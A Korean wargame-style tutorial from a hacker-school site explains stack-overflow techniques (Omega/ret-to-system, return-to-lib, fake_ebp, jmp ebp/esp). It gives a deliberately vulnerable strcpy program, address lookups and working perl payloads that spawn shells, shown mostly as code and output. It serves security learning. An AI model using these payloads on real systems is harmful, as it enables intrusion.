┍━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┑
│         :: Omega,RTL,fake_ebp,jmp ebp,jmp esp 등의 기술 ::             │
│                                                                        │
│                            - prosager in research.hackerschool.org     │
│                                           pr0z4g3r@hotmail.com         │
┕━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┙

━┯━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  │목차│
  └──┘

  0x00. 잡담

  0x01. Omega
  0x02. RTL
  0x03. fake_ebp
  0x04. jmp ebp and jmp esp

  0x05. 마치며.. 


≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡

━┯━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  │0x00. 잡담│
  └─────┘

  이번달에는 또 어떠한 내용을 쓸까? 하고 혼자서 많은 고민을 하게 되었습니다.

결국은 표족한 생각은 나지 않았지만, 중간에 beist 님의 홈페이지에 있는

심심풀이 워겜을 정훈이가 풀어달라는 요청에 의해서, 삽질을 하면서 순간적으로

오메가, RTL, jmp ebp, jmp esp, fake_ebp 와 같은 말하자면, 새로운 기술이죠.

이런 기술들에 대해서 기본적인 정리와 더불어 공격을 시도하여 보는

그런 생각으로 적게 되었습니다. 간단한 문서이니 쉽게 읽어보시고 개념을 잡는

쪽으로 생각하시면서 공부하는것이 좋을거 같습니다.


≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡

━┯━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━  
  │0x01. Omega │
  └──────┘

(아래의 문서의 말투는 조금 장난스럽게 적은건데, 이 날 기분이 업되서..-_-a

이해해 주시고 읽어주세요~~ ^^)

  난 정확히 말해서 오메가가 뭔지 모른다. 단지 이렇게 하면 되는건가? 라는 막연한

그런 생각만을 가지고 있고, 이런 방법으로도 쉘 획득이 가능하다..정도로만 언제나 

이해하고 있었다. 그래서 나스카에게 맨날 혼나지-_-v

그렇지만, 난 내 나름대로의 오메가 기법을 이야기 해 보려고 한다.

오메가~ 그 이름도 찬란한 끝-_-이란 뜻인데.. 정말로 끝일까나?

우선, 오메가의 장점은 요즘에 많이 하는것처럼 \xbf 막은거 통과하기..

버퍼 작은거 덮어서 ret 바꾸기(egg 로 그냥 ret 덮어 바꿔도 될건데 삽질하지말길..)

뭐 이런것과 같은데, 오메가가 중요한 이유는..우리가 예전에 알지 못했었던,

하나의 공격방법을 제시해 주기 때문이다. 바로 system 함수다!

시스템은 우리가 프로그램을 실행시에 언제나 메모리에 떠 있는 함수이며, 위치의 변함은 없다.

그럼 진짜로 있을까? 역시 봐야 믿겠지?

[prosager@work question]$ gdb -q vuln
(gdb) b *main  
Breakpoint 1 at 0x8048592
(gdb) r
Starting program: /home/prosager/question/vuln 

Breakpoint 1, 0x08048592 in main ()
(gdb) x/x system
0x40063430 <system>:    0x83e58955
(gdb) 

자 위와 같이 있다.

그럼 오메가는 저걸 ret 를 저 위의 숫자인 40063430 으로 바꾸면? jmp 0x40063430 할것이다.

그러면 system call~~ 하는것이쥐..

어라? 그런데 뭔가 빠진거 같지 않냐? 우리가 c 에서 system 쓸때..어케 썼었지?

system(/bin/sh); 이다..

그런데 저기 인자가 없자네..-0-

큰일이라고? 아니쥐...또 /bin/sh 도 들어가 있다.. 어디에? 메모리 영역에..

자 뒤져보자~~

내가 뒤지는건 삽질 즐~ 이니깐, 그냥 찾는 프로그램 만들어서 돌리자~

인터넷에 소스 많더라-_-

[prosager@work question]$ cat find.c
int main(int argc, char **argv)
{
        long shell;
        shell = 0x4005e430;
        while(memcmp((void*)shell,"/bin/sh",8)) shell++;
        printf("\"/bin/sh\" is at 0x%x\n",shell);
}
[prosager@work question]$ ./find 
"/bin/sh" is at 0x4014ed24

자 위와 같은 결고가 나왔다..

즉 /bin/sh 도 메모리에 있고, 그리고 system call 도 메모리에 있다, 그럼 이제 부르면되겠네.

간단한 취약 프로그램과 함께 테스트~

0x40063430 system
0x4014ed24 /bin/sh

// vuln.c
#include <stdio.h>
#include <dumpcode.h>

int main(int argc, char *argv[]) {

        char buf[4];

        strcpy(buf, argv[1]);
        dumpcode(buf,64);

}

위와 같이 되어 있는데, 스택에 어떻게 들어가는지 간단하게 그려보자

[buf][sfp][ret]와 같이 되어있고, 우리가 공격할 방법은
[AAAA][AAAA][System 주소(40063430)][system 호출후의 ret][인자(/bin/sh)4014ed24)]

와 같은 방법으로 공격을 시도할것이다.

자 그럼 스타투~

[prosager@work question]$ ./vuln `perl -e 'print "AAAAAAAA\x30\x34\x06\x40aaaa\x24\xed\x14\x40"'`
0xbffffaa4  41 41 41 41 41 41 41 41 30 34 06 40 61 61 61 61   AAAAAAAA04.@aaaa
0xbffffab4  24 ed 14 40 00 fb ff bf 2c 58 01 40 02 00 00 00   $..@....,X.@....
0xbffffac4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffffad4  02 00 00 00 f4 fa ff bf cc 85 04 08 fc 85 04 08   ................

sh-2.05b$ exit
세그멘테이션 오류
[prosager@work question]$ 

자~ 위와 같이 쉘을 획득하게 되었다.

여기서 잠시 보충설명을 하면, system 후에 세그가 나게 되는데 그 이유는

바로 위에서 보면, [system 호출후의 ret] 의 위치에 aaaa 를 넣었다. 

그렇기 때문에 system 후에 ret 위치에는 41414141 이 들어가 있으니, 당연히

세그가 나게 되는것이다.


하지만 문제점은 redhat 9 이후에는 setreuid 가 필요하다는 점이다, 이 부분에 대해서는

worm 님이 써 놓으셨으니 자세히 참고 바랍니다.

아주 간단하게, setreuid call 을 system 앞에 넣어주면서 하면 될듯 하네요~

이 부분은 각자 해보세요~ 간단할듯 하네요.

이것으로 오메가 끝~!


≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡

━┯━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  │0x02. RTL │
  └─────┘
 
  이제 Return-To-Lib 차례이다, 이 방법의 특징이라고 말할수 있는것은,

역시나 여러가지 제약조건적인 상황을 해결할수 있다는 점을 들수 있겠다.

그리고 특징은 우리가 gdb 를 이용해서 컴파일된 파일의 동적 할당메모리 영역으로

jmp 시키는 것이 가능하다는 말이다.

그렇게 함으로서 우리는 프로그램내의 flow 를 바꿀수 있다.

그럼 아래의 예제를 보면서 하나씩 설명해 보도록하자.

// rtl.c
void func1(){
        printf("func1\n");
}
void func2(){
        printf("func2\n");
}

int main(int argc, char* argv[]){
        char buf[4];

        strcpy(buf, argv[1]);
        printf("buf: %s\n", buf);
}

기본 소스는 vuln.c 와 같지만, 위의 func1,2 가 있다는 것이 다르고, 우리는 ret 를 func1 이

가르키는 장소로 변경하여 줄것이다. 자~ 스타트~

0x0804835c <func1+0>:   push   %ebp
0x08048374 <func2+0>:   push   %ebp
0x4004c8d0 <exit>:      0x57e58955


그럼 이제 저 코드를 이용해서 공격을 하여 보겠습니다~

[prosager@work question]$ ./rtl `perl -e 'print "AAAAAAAA\x5c\x83\x04\x08\x74\x83\x04\x08\xd0\xc8\x04\x40"'`
buf: AAAAAAAA瑾@
func1
func2

[prosager@work question]$ ./rtl `perl -e 'print "AAAAAAAA\x74\x83\x04\x08\x5c\x83\x04\x08\xd0\xc8\x04\x40"'` 
buf: AAAAAAAA瑾@
func2
func1



자, 위와 같이 나오게 되었습니다, 저 말은...즉..

우리가 원하는 위치의 라이브러리로 jmp 를 시켜서 flow 를 바꿀수 있게 해 준다는

말이 됩니다. 즉 소스코드 내에서 원하는 부분으로 jmp 가능하다는 말이죠~


인자를 넣어주는 방법은 worm 님이 쓰신 문서에 보시면 나오게 됩니다.

간단하게 저는 개념만 정리하는 방식이기 때문에 인자를 넣는 방법은 안 다루겠습니다

하지만 단순하게, ebp+4 위치에 넣어주면 인자가 넘어가게 됩니다.

그럼 이것으로 간단하게 RTL 기법의 해석은 끝입니다.^^



≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡

━┯━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  │0x03. fake_ebp  │
  └────────┘
  자..이제 fake_ebp 라는 기법에 대해서 알아볼 차례이다..

이 기법은 RTL 의 하나의 확장 영역이라고 보면 좋을것이다.

RTL 에서 우리는 원하는 라이브러리의 위치에 jmp 시킬수 있다는 점을 배우게 되었따.

그럼 이제 우리가 소스코드 중간의 for 문이나 이런곳으로 jmp 하는것은 어렵다는것을

간단하게 알수 있을것이다, ebp, 와 같은 문제때문에 세그가 나게 될것이다.

하지만, leaveret 의 위치로 jmp 시키고, sfp 에 우리가 원하는 문자열을 넣으면?

이런 생각을 발단으로 이 공격기법을 시도하여 보면 좋겠다, 우선적인 가상시나리오는

[buf] [sfp] [ret]
[egg ret] [fake_ebp == buf addr -4] [leaveret lib addr]

자..위와 같이 공격을 하는데 그 이유는, 우리가 넣은 fake_ebp 의 위치에 들어간 주소는

leave;ret 를 거치면서 buf addr 이 가르키는 주소(egg 주소) 로 jmp 하게 되면서

우리가 원하는 쉘을 가질수 있게 되는 것이다.

그럼 간단하게 1번에서 썼었던 vuln.c 파일을 이용해서 공격을 하여보자.

필요한 주소를 찾는 방법까지 전부다 나열하여 보겠다.

//vuln.c
#include <stdio.h>
#include <dumpcode.h>

int main(int argc, char *argv[]) {

        char buf[4];

        strcpy(buf, argv[1]);
        dumpcode(buf,64);

}

[prosager@work question]$ ./wg_egg 
0xbffffc01
에헴 쉘 띄웁니다!

0x080485ca <main+56>:   leave  


[prosager@work question]$ ./vuln  `perl -e 'print "AAAAAAAA\x01\xfc\xff\xbf\c0\xee\xff\xbf\xca\x85\x04\x08"'`
0xbfffeec4  41 41 41 41 41 41 41 41 01 fc ff bf 70 ee ff bf   AAAAAAAA....p...
0xbfffeed4  ca 85 04 08 00 ef ff bf 2c 58 01 40 02 00 00 00   ........,X.@....
0xbfffeee4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbfffeef4  02 00 00 00 14 ef ff bf cc 85 04 08 fc 85 04 08   ................

sh-2.05b$ 


자..위와 같이 쉘이 뜨게 되었다!!

이 방법은 크게 어렵지도 아니하면서, 간단하게 쉘을 띄울수 있다는 점이 중요하다..

어디에 써먹을수 있을지는 모르겠으나~ RTL 의 다른 한 방법으로서 

함수를 이용한 공격이 아닌, leave;ret 를 이용한 공격방법이니

알아두는것이 좋을것 같다..오케~ 다음!


여기서 부가 설명하나 더 하겠습니다

leave;ret 의 효과를 자세히 조금 적어줄 필요가 있다고 하네요..모르시는 분들을 위해서

mov ebp,esp
pop ebp
mov esp,eip
jmp eip

위의 4가지의 순서로 leave;ret 가 진행되구요, esp 에 ebp 를 넣구요, 그 다음으로

ebp 를 꺼내게 됩니다, 그럼 esp-4 가 ret 를 가르키게 됩니다. 그리고 그것을

eip 에 넣고 jmp ~ 이게 leave;ret 의 사용법이었습니다.

이것을 생각하시면서 보시면, 쉽게 이해가 될거 같네요..^^



≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡

━┯━━━━━━━━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━
  │0x04. jmp ebp and jmp esp │
  └─────────────┘

  지금은 mutacker 님이 쓰신 문서들이 많이 읽히고 있는데, 예전의 저희가 몽이님의

문제에서 써 먹었었던 jmp ebp, jmp esp 기술들을 서술하여 보려고 합니다

그때 한참 RPC DCOM 버그가 나왔을때 이 기술들이 나왔던것으로 기억합니다.

이 기술은 fake ebp 와는 약간은 다른 방식의 접근을하지만, ret 주소를 이용한 변조

그리고 jmp 하는 방법에서는 같은 맥락입니다, 하지만 공격 방식에 대해서는

다시 한번 확실하게 보여 드리겠습니다.^^


우선 가상의 공격 시나리오를 짜고, 공격을 하겠습니다.

기본적인 공격 코드는 vuln.c 를 사용합니다.

//vuln.c 
#include <stdio.h>
#include <dumpcode.h>

int main(int argc, char *argv[]) {

        char buf[4];

        strcpy(buf, argv[1]);
        dumpcode(buf,64);

}

여기서 스택에는 잘 알다시피

[buf] [sfp] [ret] 이런 모양이 되구요, 우리가 공격할 시나리오는

[nop nop jmp ebp] [egg shell addr] [buf addr]

이렇게 됩니다, 공격의 시나리오는, buf 위치가 가르키는 것을 실행하게 됩니다

그 코드가 jmp ebp 코드이므로, ebp 에 들어가 있는 egg_shell_addr 로 점프해서

그 코드를 실행하여서 egg 쉘을 획득한다~ 라고 하는 공격의 방법입니다.

쉽죠? ^^ 하지만 여기서 문제점이 jmp ebp 의 asem 코드를 모른다~ 라는 것입니다

그럴경우를 대비하여서 간단하게 저희가 필요한 asem 코드를 간단하게 짜 보았습니다.


// jmp.s
.globl main
main:
        jmp *%ebp
        jmp *%esp
        leave
        ret

위의 코드를 컴파일 하고 , objdump 로 필요한 코드를 찾습니다.

080482f4 <main>:
 80482f4:       ff e5                   jmp    *%ebp
 80482f6:       ff e4                   jmp    *%esp
 80482f8:       c9                      leave  

자, 위를 보시면, jmp ebp 는 ff e5 와 같이 나옵니다

그럼 우리가 구성할 buf 에는 [\x90\x90  \xff \xe5] 와 같은 공격코드가 들어갈

것입니다, 그럼 공격을 하여 봅시다.^^

[prosager@work question]$ ./wg_egg 
0xbffffc01

[prosager@work question]$ ./vuln `perl -e 'print "\x90\x90\xff\xe5\x01\xfc\xff\xbf\xd4\xee\xff\xbf"'`
0xbfffeed4  90 90 ff e5 01 fc ff bf d4 ee ff bf 00 00 00 00   ................
0xbfffeee4  24 ef ff bf 30 ef ff bf 2c 58 01 40 02 00 00 00   $...0...,X.@....
0xbfffeef4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbfffef04  02 00 00 00 24 ef ff bf cc 85 04 08 fc 85 04 08   ....$...........

sh-2.05b$ 

자, 성공했다, 위와 같이, [nopnop+jmp ebp] [egg addr] [buf addr]

과 같은 공격으로 쉘을 획득하였다..^^


다른 방법인 jmp esp 에 대해서 알아보자, jmp esp 와 jmp ebp 의 다른점은 뭘까?

단순하다-_-, esp 와 ebp 의 차이점인 것이다, 그런데 여기서 중요한 점은 우리가 원하는

fake ebp 에서 처럼 ebp 값을 바꿀수는 있는데 esp 의 값은 바꿀수가 없다는 문제점이 발생한다

눈치 빠른 사람은 위의 jmp.s 코드에서 leave 보고 알았겠지만..

leave 는 mov %ebp,%esp 커맨드를 실행하여서, ebp 값을 esp 으로 넣어주는 역활이 있다

그러면 간단하다 위의 공격법에서 leave 만 추가 시키면 되는 것이다.. 쉽죠? ㅎㅎ

그럼 가상의 공격코드는..

[buf] [sfp] [ret]
[nop + leave + jmp esp] [egg addr] [buf addr]

leave : c9
jmp esp : ff e4

그럼 공격 바로 들어갑니다~

[prosager@work question]$ ./vuln `perl -e 'print "\x90\xc9\xff\xe4\x01\xfc\xff\xbf\xd4\xee\xff\xbf"'`
0xbfffeed4  90 c9 ff e4 01 fc ff bf d4 ee ff bf 00 00 00 00   ................
0xbfffeee4  24 ef ff bf 30 ef ff bf 2c 58 01 40 02 00 00 00   $...0...,X.@....
0xbfffeef4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbfffef04  02 00 00 00 24 ef ff bf cc 85 04 08 fc 85 04 08   ....$...........

sh-2.05b$ 

오케~ 위와 같이 앞에 c9 가 들어가면서 jmp esp 로 인해서 jmp~ 하였다

이로서 jmp esp, jmp ebp 에 대한 설명이 끝나게 되었습니다^^





≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡



━┯━━━━━━┯━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  │0x05. 마치며│
  └──────┘

  요즘에는 워게임 비슷한 종류의 새로운 기술을 익히는것에 중점보다는

coun 같은 일종의 생각을 바꾸고, 약간은 다른 발상을 하며, 재밌는 일이나

뭐 이런 종류의 사고에 재미를 붙이고 있네요, 그래서 그런지 조금은

기술적인 문서는 쓰기가 어렵지만, 설명이나, 글을 써 나가는 데 있어서는 조금은

편하다는 느낌이 듭니다.^^, 언젠가는 경영에 대한 글들을 wgd 에 실을지도-_-

모른다는 압박이 느껴지네요..^^

이 문서를 통해서 기본적인 기법에 이러한 것들이 있다는 것을 알았으면 합니다

그럼..수고하셨습니다.^^

≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡